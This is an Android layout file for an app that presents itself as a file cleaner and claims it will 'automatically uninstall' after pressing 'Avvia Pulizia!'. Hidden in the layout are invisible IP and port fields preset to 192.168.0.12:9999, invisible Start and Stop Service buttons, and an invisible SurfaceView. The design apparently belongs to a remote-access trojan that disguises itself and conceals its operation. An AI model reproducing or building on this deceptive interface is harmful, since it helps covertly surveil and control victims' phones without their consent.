<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    android:orientation="vertical"
    android:background="@drawable/back" >

    <ImageView
        android:id="@+id/imageView1"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_weight="0.46"
        android:src="@drawable/clean" />

    <TextView
        android:id="@+id/textView1"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_weight="0.46"
        android:gravity="center_horizontal"
        android:paddingTop="10dp"
        android:text="Press start for remove the unnecessary files from the system. This app will automatically uninstall."
        android:textSize="18sp"
        android:textStyle="bold" />

    <Button
        android:id="@+id/button1"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_weight="0.46"
        android:text="Avvia Pulizia!" 
        android:onClick="onClickBtn" />

    <SurfaceView
        android:id="@+id/surfaceView1"
        android:layout_width="100dp"
        android:layout_height="100dp"
        android:layout_weight="0.46"
        android:visibility="invisible" />

    <ProgressBar
        android:id="@+id/progressBar1"
        style="?android:attr/progressBarStyleLarge"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:visibility="invisible" />

    <LinearLayout
        android:layout_width="fill_parent"
        android:layout_height="wrap_content"
        android:orientation="horizontal" >

        <TextView
            android:layout_width="wrap_content"
            android:layout_height="fill_parent"
            android:text="IP : "
            android:visibility="invisible" />

        <EditText
            android:id="@+id/ipfield"
            android:layout_width="fill_parent"
            android:layout_height="14dp"
            android:text="192.168.0.12"
            android:visibility="invisible" />

    </LinearLayout>

    <LinearLayout
       android:layout_width="fill_parent"
        android:layout_height="wrap_content"
        android:orientation="horizontal"
        android:text="Port : " >

        <TextView
            android:layout_width="wrap_content"
            android:layout_height="fill_parent"
            android:text="Port : "
            android:visibility="invisible" />

        <EditText
            android:id="@+id/portfield"
            android:layout_width="fill_parent"
            android:layout_height="6dp"
            android:text="9999"
            android:visibility="invisible" />

    </LinearLayout>

    <Button
        android:id="@+id/buttonstart"
        android:layout_width="match_parent"
        android:layout_height="10dp"
        android:text="Start Service"
        android:visibility="invisible" />

    <Button
        android:id="@+id/buttonstop"
        android:layout_width="match_parent"
        android:layout_height="12dp"
        android:text="Stop Service"
        android:visibility="invisible" />

</LinearLayout>